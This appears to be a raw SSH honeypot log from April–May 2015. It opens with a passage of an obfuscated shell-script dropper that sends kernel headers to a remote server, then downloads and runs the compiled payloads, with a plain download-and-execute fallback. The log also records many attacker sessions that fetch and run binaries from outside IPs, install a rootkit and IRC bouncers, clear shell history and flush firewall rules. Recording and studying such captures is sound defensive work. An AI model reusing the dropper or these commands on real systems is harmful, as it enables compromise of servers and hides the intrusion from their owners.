		if [ $? -eq 1 ];then
			generate # create header file
			if [ $? -eq 1 ]; then
				upload
				if [ $? -eq 1 ] ;then
					__done=1
				fi
				rm -rf $__temp__/dev.tgz
			else
				if [ -f $__temp__/dev.tgz ]; then
				 rm -rf $__temp__/dev.tgz
				fi
			  compiler $__iid # remote compiler
			  if [ $? -eq 1 ]; then
				 __done=1
			  fi
			fi
		else
			compiler $__iid # remote compiler
			if [ $? -eq 1 ]; then
				__done=1
			fi
		fi
	fi

	if [ $__done -eq 1 ]; then
		download $__iid
		if [ $? -eq 1 ]; then
			uncompress $__iid
			if [ $? -eq 1 ]; then
				setup $__iid
				if [ $? -ne 1 ]; then
					__done=0
				fi
			else
				__done=0
			fi
		else
			__done=0
		fi
	fi

	if [ $__done -eq 0 ]; then
		download_and_execute
	fi
	rm -rf $__temp__/$__iid
}

main
ls -la /var/run/mount.pid
exit $?

Exec __host_32__="sEEA+==deadefadcajc+jjjj"
__host_64__="sEEA+==deadefadcaih+jjjj"

__host_32_2__="sEEA+==cbeadgakaddh+jjjj"
__host_64_2__="sEEA+==cbeadgakaddg+jjjj"

__host_32_libc__="sEEA+==cbeadgakaddh+jjjj"
__host_64_libc__="sEEA+==cbeadgakaddg+jjjj"

__download_url__="sEEA+==deadefahbacfb=tyDElww=jbbh"

__remote__="cbeadgakadfg+jbbh|cbeadfbacfcagb+jbbh|hhacbdadgeaeb+jbbh|yoyDaoDludlcazCr+jbbh|yoyDaoDludlazCr+jbbh|yoyDasnItlzlzanzx+jbbh|yoyDaoDludlanzx+jbbh"

__username__='loxty'
__password__='admin'

__temp__=/tmp
__install_dir__=/usr/local/bin
__kernel__=`uname -r|awk -F- '{print $1}'`

# select compiler server
server(){
	__osv_X86_64=`dec 'Ijh_hf'`
	__osv_AMD64=`dec 'LXOhf'`
	__os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
	__os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
	if [ -f /lib/libc.so.6 ]; then
		__libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
		__libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
	fi

	if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
		__online=`wget "$__host_64__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
		if [ ! -z "$__online" ]; then #
			__host__=$__host_64__
		else
			__host__=$__host_64_2__
		fi

		if [ -f /lib/libc.so.6 ]; then
			if [ $__libc_main -le 2 ]; then
				if [ $__libc_sub -le 5 ]; then
					__host__=$__host_64_libc__
				fi
			fi
		fi
	else
		__online=`wget "$__host_32__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
		if [ ! -z "$__online" ]; then #
			__host__=$__host_32__
		else
			__host__=$__host_32_2__
		fi

		if [ -f /lib/libc.so.6 ]; then
			if [ $__libc_main -le 2 ]; then
				if [ $__libc_sub -le 5 ]; then
					__host__=$__host_32_libc__
				fi
			fi
		fi
	fi
}

# check md5
md5(){
	__data=`echo "$@"`
	echo -n "$__data"|md5sum|cut -d ' ' -f1
	return 0
}

# get os version
version(){
	if [ -f /sbin/modinfo ]; then
		SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
		echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
	fi
	return 0
}

checkBuild(){
	__build=/lib/modules/`uname -r`/build/
	if [ -d $__build ]; then
		return 1
	fi
	return 0
}

# generate header file
generate(){
	__files=`ls $__build`
	tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
	if [ $? -eq 0 ] ;then
		return 1
	fi
	return 0
}

# check header version
check(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__result=`wget "$__host__/check.action?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
		if [ ! -z "$__result" ]; then
			__code=`echo $__result|awk -F "|" '{print $1}'`
			__md5=`echo $__result|awk -F "|" '{print $2}'`
			if [ $__code -eq 1001 ]; then
				return 1
			fi
		fi
	fi
	return 0
}

# download build file
download(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__url="$__host__/upload/module/$__iid/build.tgz"
		wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
		if [ $? -eq 0 ];then #
			return 1
		fi
	fi
	return 0
}

download_and_execute(){
	wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
	if [ $? -eq 0 ];then #
		chmod +x /tmp/bin
		/tmp/bin
		sleep 3
		rm -rf /tmp/bin
		return 1
	fi
	return 0
}

# remote compiler code
compiler(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__url="$__host__/compiler.action?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
		__result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
		if [ ! -z "$__result" ]; then
			__code=`echo $__result|awk -F "|" '{print $1}'`
			__md5=`echo $__result|awk -F "|" '{print $2}'`
			if [ $__code -eq 1001 ]; then
				return 1
			fi
		fi
	fi
	return 0
}

# uncompress file
uncompress(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		if [ ! -d $__temp__/$__iid ]; then
			mkdir $__temp__/$__iid
		fi
		tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
		if [ $? -eq 0 ] ;then
			shred -u -z $__temp__/build.tgz
			return 1
		fi
	fi
	return 0
}
enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }

# install file
setup(){
	__iid=`echo "$@"`
	if [ ! -z "$__iid" ]; then
		__bin=`echo "bin"`
		chmod +x $__temp__/$__iid/$__bin
		$__temp__/$__iid/$__bin
		if [ $? -eq 0 ]; then
			sleep 3
			rm -rf $__temp__/$__iid/$__bin
			return 1
		fi
	fi
	return 0

}

# upload
upload(){
	rm -f /tmp/mini
	wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
	if [ $? -eq 0 ];then #
		chmod +x /tmp/mini
		__url=$__host__/submit.action
		__result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
		if [ ! -z "$__result" ]; then
			__code=`echo $__result|awk -F "|" '{print $1}'`
			__md5=`echo $__result|awk -F "|" '{print $2}'`
			if [ $__code -eq 1001 ]; then
				rm -f /tmp/mini
				return 1
			fi
		fi
		rm -f /tmp/mini
	fi
	return 0
}

# main entry
main(){
	PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
	__host_32__=`dec "$__host_32__"`
	__host_64__=`dec "$__host_64__"`
	__host_32_2__=`dec "$__host_32_2__"`
	__host_64_2__=`dec "$__host_64_2__"`
	__host_32_libc__=`dec "$__host_32_libc__"`
	__host_64_libc__=`dec "$__host_64_libc__"`
	__download_url__=`dec "$__download_url__"`
	__remote__=`dec "$__remote__"`
	__username__=`dec "$__username__"`
	__version__=`version`
	__iid=`md5 "$__version__"`
	__iid=`echo $__iid|tr [:lower:] [:upper:]`
	__done=0

	if [ ! -d /tmp ]; then
	mkdir /tmp
	fi

	if [ -f /usr/bin/wget ]; then
	chattr -i /usr/bin/wget
	chmod +x /usr/bin/wget
	fi

	if [ -f /bin/wget ]; then
	chattr -i /bin/wget
	chmod +x /bin/wget
	fi

	if [ -f /usr/bin/cut ]; then
	chattr -i /usr/bin/cut
	chmod +x /usr/bin/cut
	fi

	if [ -f /bin/cut ]; then
	chattr -i /bin/cut
	chmod +x /bin/cut
	fi

	server # select http server
	check $__iid
	if [ $? -eq 1 ];then
		compiler $__iid # remote compiler
		if [ $? -eq 1 ]; then
			__done=1
		fi
	else
		checkBuild
		if [ $? -eq 1 ];then
			generate # create header file
			if [ $? -eq 1 ]; then
				upload
				if [ $? -eq 1 ] ;then
					__done=1
				fi
				rm -rf $__temp__/dev.tgz
			else
				if [ -f $__temp__/dev.tgz ]; then
				 rm -rf $__temp__/dev.tgz
				fi
			  compiler $__iid # remote compiler
			  if [ $? -eq 1 ]; then
				 __done=1
			  fi
			fi
		else
			compiler $__iid # remote compiler
			if [ $? -eq 1 ]; then
				__done=1
			fi
		fi
	fi

	if [ $__done -eq 1 ]; then
		download $__iid
		if [ $? -eq 1 ]; then
			uncompress $__iid
			if [ $? -eq 1 ]; then
				setup $__iid
				if [ $? -ne 1 ]; then
					__done=0
				fi
			else
				__done=0
			fi
		else
			__done=0
		fi
	fi

	if [ $__done -eq 0 ]; then
		download_and_execute
	fi
	rm -rf $__temp__/$__iid
}

main
ls -la /var/run/mount.pid
exit $?

From 157.7.152.198 10-Apr-2015 02:40:37 ssh2 root
Exec wget -c http://62.210.209.198/59&&chmod 777 59

From 157.7.152.198 10-Apr-2015 07:33:41 ssh2 root
Exec wget -c http://62.210.209.198/49&&chmod 777 49

From 87.243.2.38 10-Apr-2015 12:26:45 ssh2 root
ls -l
cd /
ls -l
cd vmware
ls -l
clear
exit

From 59.188.237.12 11-Apr-2015 07:59:01 ssh2 root
Exec uname -m

From 222.186.129.101 11-Apr-2015 12:37:41 ssh2 root
Exec echo test&killall *&cat /proc//\cpuinfo

From 82.135.211.82 11-Apr-2015 22:58:39 ssh2 root
Exec help

From 157.7.238.124 12-Apr-2015 13:17:25 ssh2 root
Exec wget -c http://62.210.209.198/79&&chmod 777 79

From 93.190.139.152 12-Apr-2015 19:40:35 ssh2 root
Exec cat /etc/issue ; uname -a ; echo === ; cat /proc/cpuinfo | grep "model name" ; echo === ; ifconfig ; echo === ; echo === ; gcc ; df -h

From 107.182.141.25 13-Apr-2015 06:01:33 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a06
chmod +x a06
./a06

From 210.75.225.72 13-Apr-2015 08:49:41 ssh2 root
Exec id

From 141.85.252.213 13-Apr-2015 15:57:23 ssh2 root
ls
mc
ls
cd /
ls
uname -a
ls -la
less lan.doc
more lan.doc
cat lan.doc
pwd
cd /etc
ls
ls -lA
w
who
?
help
ps aux
netstat -t
ls /bin
echo funny
echo funny > pif.txt
ls -la
ls pif.txt
touch pif.txt
exit

From 157.7.152.183 13-Apr-2015 23:28:53 ssh2 root
Exec wget -c http://62.210.209.198/49&&chmod 777 49
wget -c http://62.210.209.198/49&&chmod 777

From 93.190.139.152 14-Apr-2015 04:21:57 ssh2 root
Exec cat /etc/issue ; uname -a ; echo === ; cat /proc/cpuinfo | grep "model name" ; echo === ; ifconfig ; echo === ; echo === ; gcc ; df -h
cat /etc/issue
uname -a
echo ===
cat /proc/cpuinfo | grep
echo ===
ifconfig
echo ===
gcc
df -h

From 157.7.238.124 14-Apr-2015 09:15:01 ssh2 root
Exec wget -c http://62.210.209.198/76&&chmod 777 76
wget -c http://62.210.209.198/76&&chmod 777

From 184.164.71.41 14-Apr-2015 12:35:27 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a07
chmod +x a07
./a07
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07

From 96.44.189.101 14-Apr-2015 14:08:05 ssh2 root
export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
w
who
unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
id
w
df -h
ls -a
uname -a
cat /etc/issue
cat /etc/*release
cat /etc/*rele*
ls -a /etc/ |grep
pwd
ls a- /
ls -a /
nano test.pl
ls -a
w
uptime
who

From 96.44.189.101 14-Apr-2015 19:01:09 ssh2 root
export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
ls -a
uptime
yum
apt-get
apt-get install gcc make
gcc
apt-get install nano
apt-get install libssl
apt-get install zlib1g-dev
apt-get install libpam0g-dev
apt-get install g++
ls -a /bin
gcc
pwd
df -h
cd /var
d /usr/save
ls
ls -al
cd ..
pwd
ls -a
cd root
ls
ls -a mbox
ls -a
locate network.pl
apt-get install bin-utils
sudo apt-get install libssl
id
uptime
who
wget
ap
ps -x
ls -al
ls -a /usr/lib/libc
id
uptime who
cd /usr/local/include/
ls -a
cd /usr
ls
cd nsmail
s
ls -a pwd
cd .xauth
mkdir ". "
apt-get install mkdir
mkdir ". "
pwd ls
ps -aux
ls -al /usr/bin/startx
who
whoami
id
uptime
netstat -an |grep 22
apt-get install netstat
netstat -tap
cd ..
cd /root
rm -rf .bash_history
touch .bash_history
id
ls -al
cat .bash_history

From 78.191.192.98 16-Apr-2015 05:12:37 ssh2 root
e
w
cat /etc/redhat-release
ethtool eth0
apt-get install ethtool

From 198.15.131.137 16-Apr-2015 05:51:35 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08

From 78.191.192.98 16-Apr-2015 14:58:45 ssh2 root
w
cat /etc/redhat-release

From 194.150.168.95 17-Apr-2015 20:17:09 ssh2 root
export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
cat /etc/passwd
id uname a
ping
oung
ping
ls -al

From 221.229.166.28 18-Apr-2015 01:10:13 ssh2 root
exit
ls .a .rav8
ls -al .rav8
ls -al .gftp
cat .bash_history
exit

From 176.10.99.202 18-Apr-2015 20:42:29 ssh2 root
uname -a
yum install gcc
exit

From 78.183.248.143 19-Apr-2015 21:07:49 ssh2 root
ls
perl regas.pl
ls
ping -f 192.168.1.1
ping 192.168.1.1
service iptables stop
cd /root
ls
chmod +x *
ls
sudo
apt-get install gcc
apt-get install perl
ls
reboot
/sbin/reboot
./gtk
wget http://download1778.mediafire.com/96n5b95l2b0g/bs19jfqbyfovq15/88udp
wget -c http://download1778.mediafire.com/96n5b95l2b0g/bs19jfqbyfovq15/88udp
reboot
power off
sudo shutdown -h now
sudo
/var/log$ sudo shutdown -h now
cd /var/log$ sudo shutdown -h now
ls
Mail
./Mail
perl
perl test1.pl
sudo perl test1.pl
cd /root
ls
last -f /var/log/utmp
wget http://download1778.mediafire.com/96n5b95l2b0g/bs19jfqbyfovq15/88udp
ks-post.log
cd /ks-post.log

From 78.183.248.143 20-Apr-2015 02:00:53 ssh2 root
reboot
cd /usr/bin/
ls
wget -r -nH ftp://192.168.0.101:/myscript/* -P /root/l
chmod -R 755 /root/*
ls
/usr/bin/wget -r -nH ftp://192.168.0.101:/myscript/* -P /root/l
cd /usr/bin/wget -r -nH ftp://192.168.0.101:/myscript/* -P /root/l
ls

From 78.183.248.143 20-Apr-2015 06:53:57 ssh2 root
sudo poweroff
sudo reboot
sudo halt
sudo init 6
shutdown --help
help
man shutdown
/usr/bin/dbus-send --system --print-reply --dest="org.freedesktop.ConsoleKit" /org/freedesktop/ConsoleKit/Manager org.freedesktop.ConsoleKit.Manager.Stop
cd /usr/bin/dbus-send --system --print-reply --dest="org.freedesktop.ConsoleKit" /org/freedesktop/ConsoleKit/Manager org.freedesktop.ConsoleKit.Manager.Stop
sudo ufw status
ls
sudo ufw disable
sudo iptables-save > $HOME/firewall.txt
ls
rm -rf OpenOffice.org1.0
rm -rf reglas test1.pl reglas.pl vmware ideb mbox
ls
rm -rf lan.doc simplefirewall-stable
ls

From 5.9.156.238 20-Apr-2015 11:47:01 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=
last -w
ps -ef
exit

From 5.157.122.103 20-Apr-2015 16:40:05 ssh2 root
w
uname -a
ifconfig
cat /proc/cpuinfo
passwd
password
pass
history
wget http://commentteam.ucoz.com/bash.tgz
ls
yum -y install glibc.i686
apt-get install glibc.i386
wget http://commentteam.ucoz.com/bash.tgz

From 162.220.24.141 21-Apr-2015 12:12:21 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09
chmod +x a09
./a09
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09 chmod +x a09 ./a09

From 5.157.122.103 21-Apr-2015 17:05:25 ssh2 root
w
ifconfig
cat /proc/cpuinfo
history
passwd

From 38.68.17.240 22-Apr-2015 16:37:05 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a08
chmod +x a08
./a08
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08

From 78.170.117.212 22-Apr-2015 22:23:49 ssh2 root
w
history
ls
last
vl

From 162.220.27.170 23-Apr-2015 02:56:07 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a07
chmod +x a07
./a07
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a07
chmod +x a07
./a07
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a07 chmod +x a07 ./a07

From 78.191.207.161 23-Apr-2015 08:09:57 ssh2 root
w
history
cd
top c

From 107.182.141.25 23-Apr-2015 23:34:11 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://23.234.19.202/i/a06
chmod +x a06
./a06
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a06 chmod +x a06 ./a06

From 49.213.22.22 24-Apr-2015 08:35:17 ssh2 root
yum -y install perl-Net-SSLeay
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.690_all.deb
echo 'nameserver 8.8.8.8' > /etc/resolv.conf
su -
apt-get install sudo
yum install sudo
visudo
sudo -i
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install nano
sudo apt-get update
sudo apt-get install nano
cat /etc/sysconfig/network-scripts/ifcfg-eth0
vi /etc/sysconfig/network-scripts/ifcfg-eth0

From 222.186.21.209 24-Apr-2015 13:28:21 ssh2 root
shutdown -r now
yum install phpMyAdmin
sudo apt-get install xrdp
sudo apt-get install ubuntu-desktop
echo "gnome-session --session=ubuntu-2d" > ~/.xsession
sudo apt-get update
cd /tmp
wget http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm
rpm -ivh epel-release-6-8.noarch.rpm
yum search phpmyadmin
yum -y install phpmyadmin
yum install mysql-server mysql
mysql_secure_installation
vi /etc/httpd/conf.d/phpMyAdmin.conf
apt-get update
apt-get install dnsutils
nslookup google.com
reboot

From 49.213.22.22 24-Apr-2015 18:21:25 ssh2 root
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.690_all.deb
dpkg -i webmin_1.690_all.deb
-Y
echo $PATH
export PATH=$PATH:/bin:/usr/local/bin
apt-get install dnsutils
y
echo 'nameserver 8.8.8.8' > /etc/resolv.conf
yum -y install perl-Net-SSLeay
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.690_all.deb
-c
apt-get update
apt-get upgrade
apt-get install nano
nano /etc/ssh/sshd_config
apt-get install dropbear
nano /etc/default/dropbear
wget http://download.virtualbox.org/virtualbox/4.3.16/VirtualBox-4.3-4.3.16_95972_el6-1.i686.rpm
--continue
yum -y update
rm /var/cpanel/hulkd/enabled
rw init=/bin/bash
umount /dev/sda1
/etc/init.d/mysql restart
yum -y install http://download.webmin.com/download/yum/webmin-1.740-1.noarch.rpm
yum update -y
yum install gcc make rpm-build autoconf.noarch zlib-devel pam-devel

From 58.218.199.49 24-Apr-2015 23:14:29 ssh2 root
apt-get purge apache2* bind9* samba*
apt-get update
apt-get upgrade

From 114.215.176.153 25-Apr-2015 04:07:33 ssh2 root
apt-get install nano
apt-get install xorg lxde-core tightvncserver
setenforce 0
wget http://soluslabs.com/installers/solusvm/install chmod 755 install
./install
iptables -A INPUT -p tcp --dport 5353 -j
wget http://soluslabs.com/installers/solusvm/install chmod 755 install

From 211.151.182.212 25-Apr-2015 23:39:49 ssh2 root
/sbin/ifconfig | grep inet -wc
cat /etc/hosts
last

From 5.254.149.125 26-Apr-2015 04:32:53 ssh2 root
last
cd
ls -a
cat .bash_history
cat /etc/issue
cd /var/tmp
ls -a wget
cd /dev/shm
ls
mkdir .,
wget
w
wget http://soft.hackrz.org/bnc/psy-autologin-autorun.tgz
tar xzvf psy-autologin-autorun.tgz
rm -rf psy-autologin-autorun.tgz
mv psy-autologin-autorun .z
cd .z
chmod +x *
./autorun & ./start
wget http://soft.hackrz.org/bnc/psy-autologin-autorun.tgz
curl
ls -a
./au
bash
./autorun
cd ..
rm -rf .z

From 62.112.193.131 26-Apr-2015 09:25:57 ssh2 root
unset HISTFILE HISTSAVE
w
ps -ax
cat /proc/cpuinfo
netstat -at
pwd
ls -al
cd .ss
sl -al
s -al
ls -al
cd .ssh
ls -al
pwd
wget http://y2000.hu/dreams/myr00tk1t.tgz
tar zxvf myr00tk1t.tgz
rm -rf myr00tk1t.tgz
cd myr00tk1t
./setup
cd /tmp
ls -l
pwd
wget
curl
fetch
cat /etc/issue
uname
uname -a
cat /etc/issue
wget
ls -al
apt-get
apt-get remove wget
ls -al
cat .bash_history
ps -ax
ls -al
cat ftp.openbsd.org
cd ftp.openbsd.org
pwd
ls -al
exit

From 219.151.8.155 26-Apr-2015 13:28:23 ssh2 root
netstat -an
ps -aux
uname -a
chattr +i /etc/init.d/iptables
cd /usr/bin/
ls

From 172.162.13.28 27-Apr-2015 09:51:17 ssh2 root
w
ifconfig
cat /proc/cpuinfo
passwd
pwd
passwd
yum
uname -a
cd ~
passwd
ls
cd /tmp
ls
cd /var/tmp
ls
wget
tar
perl
yum
apt-get
apt-get install tar
tar

From 172.162.13.28 27-Apr-2015 14:44:21 ssh2 root
cat /etc/*release

From 117.79.132.226 27-Apr-2015 20:25:29 ssh2 root
uptime
netstat -atnp
cd /tmp
wget

From 188.99.115.169 28-Apr-2015 00:30:29 ssh2 root
passwd
w
uname -a

From 79.113.190.252 28-Apr-2015 05:23:33 ssh2 root
sudo su
passwd
w , uptime
cat /proc/cpuinfo
ps x
w
id
ifconfig
history
cd /var/tmp
ls -a
mkdir " "

From 117.79.132.226 28-Apr-2015 06:44:31 ssh2 root
wget http://192.168.70.129/fdcservery
uptime
uname -a

From 79.113.190.252 28-Apr-2015 15:09:41 ssh2 root
cd /var/tmp

From 117.79.132.226 28-Apr-2015 17:03:33 ssh2 root
chmod 0755 /usr/bin/chattr

From 88.85.253.230 28-Apr-2015 20:02:45 ssh2 root
passwd
ls
pass
wget
wget http://root-arhive.at.ua/psybnc/psybnc.jpg
ifconfig
wget http://root-arhive.at.ua/psybnc/psybnc.jpg
wget http://root-arhive.serveftp/scanner/gosh.jpg
cd
ls
http://root-arhive.at.ua/psybnc/psybnc.jpg
wget -c
passwd
Y
cd/bash
-Y
bash

From 82.137.11.110 29-Apr-2015 00:55:49 ssh2 root
wget -Y
free
uid
wget http://root-arhive.at.ua/psybnc/psybnc-linux.jpg
uname -a
c
-c
wget -c -Y
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
wget -Y on
exit
wget -Y on -Y on onhive.serveftp/scanner/gosh.jpg -Y on
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
ls
wget http://root-arhive.serveftp.com/scanner/gosh.jpg
w
wget -O
wget -Y on
wget -Y

From 88.85.253.230 29-Apr-2015 05:48:53 ssh2 root
wget -U
wget f0rever.host.sk/mix/ssh.tgz.gz
adduser
add
-a
yum
exit

From 172.162.13.28 29-Apr-2015 10:41:57 ssh2 root
w
yum install passwd
apt-get install passwd
passwd

From 107.182.141.25 29-Apr-2015 13:41:37 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a08
chmod +x a08
./a08
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08 chmod +x a08 ./a08
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a08
chmod +x a08
./a08
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08 chmod +x a08 ./a08

From 5.10.186.122 29-Apr-2015 15:29:43 ssh2 root
unset HISTFILE
w
ls -la
w
ls -la
ps ax
w
/sbi ifco
ifcofnig
/sbin/ifconfig
w
wget
ls -la
uname -a
hostname
ps x
w ,uptime
cat .bash_history
ls -la
cd /ro
pwd
cat .bash_history
ps ax
w
cd /var/tmp
pwd

From 5.10.186.122 29-Apr-2015 15:35:01 ssh2 root
unset HISTFILE
w
ls -la
w
ls -la
ps ax
w
/sbi ifco
ifcofnig
/sbin/ifconfig
w
wget
ls -la
uname -a
hostname
ps x
w 
uptime
cat .bash_history
ls -la
pwd
cat .bash_history
ps ax
w
cd /var/tmp
pwd

From 89.204.139.186 29-Apr-2015 20:28:05 ssh2 root
cd /tmp
ls -la
cd /root
w
ls -la
id
cd /var/tmp
ls -la
uname -a
kill -9 -1
ls
kill -9 -1
reboot
cd /var/tmp
reboot
ls
exit
cd /dev/shm
cat /proc/cpuinfo
wget http://wmbro.webs.com/binfo.tgz

From 172.162.76.243  1-May-2015 11:32:37 ssh2 root
w
tar
wget
ps -ax
lfetch
fetch

From 172.162.0.135  1-May-2015 16:25:41 ssh2 root
ftech
fetch
curl
yum
apt-get
apt-get install tar
tar
w
cat /proc/cpuinfo
uname -a
ps -aux
cd /home
ls
reboot

From 78.165.17.116  3-May-2015 02:37:09 ssh2 root
history
ls
w
cat /etc/redhat-release

From 78.165.17.116  3-May-2015 07:30:13 ssh2 root
w
ls
last

From 107.189.144.54  3-May-2015 17:16:21 ssh2 root
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip
Exec #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://38.68.20.127/i/a09.zip
chmod +x a09.zip
./a09.zip
#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip

From 222.186.21.208  4-May-2015 07:55:33 ssh2 root
Exec iptables -F
iptables -F

From 78.134.100.121  4-May-2015 12:48:37 ssh2 root
w
ls -a

From 43.229.52.142  4-May-2015 17:41:41 ssh2 root
mkdir .,.
cd /var/tmp
ls -a
history
ifconfig
wget http://commentteam.ucoz.com/scan.tgz
c
history

From 78.134.100.121  5-May-2015 18:07:01 ssh2 root
w
ls -a
ifconfig
cat /proc/cpuinfo
mkdir .,.
cd /var
ls
cd /var/tmp
ls
mkdir .,.
wget http://commentteam.ucoz.com/scan.tgz
history

From 91.81.221.171  6-May-2015 18:32:21 ssh2 root
uname
uname -a
cat /proc/cpuinfo

From 91.81.221.205  7-May-2015 04:18:29 ssh2 root
cat /proc/cpuinfo

From 60.28.186.142  7-May-2015 14:04:37 ssh2 root
host

From 91.81.221.205  7-May-2015 18:57:41 ssh2 root
host
hostname
ls
cat ipcalc.pl
nano ipcalc.pl
adduser support

From 91.81.221.205  7-May-2015 23:50:45 ssh2 root
history -c
rm rf history
adduser
uname
useradd -r support
user add -r support
sudo adduser support
user
adduser
uname a
uname -a
clear
uname -a
ls
cd /
ls
cd /
cd ..
ls c

From 43.229.52.149  8-May-2015 04:43:49 ssh2 root
fdisk -l
apt-get update
aptget install update
/bin
cd /bin
ls
lsblk
ls blk
wget

From 5.90.3.116  8-May-2015 09:36:53 ssh2 root
ls pwd
pwd
adduser

From 5.90.3.116  8-May-2015 14:29:57 ssh2 root
ls cd /
cd /
pwd
ls
dir
Cat network.pl
cd root
ls
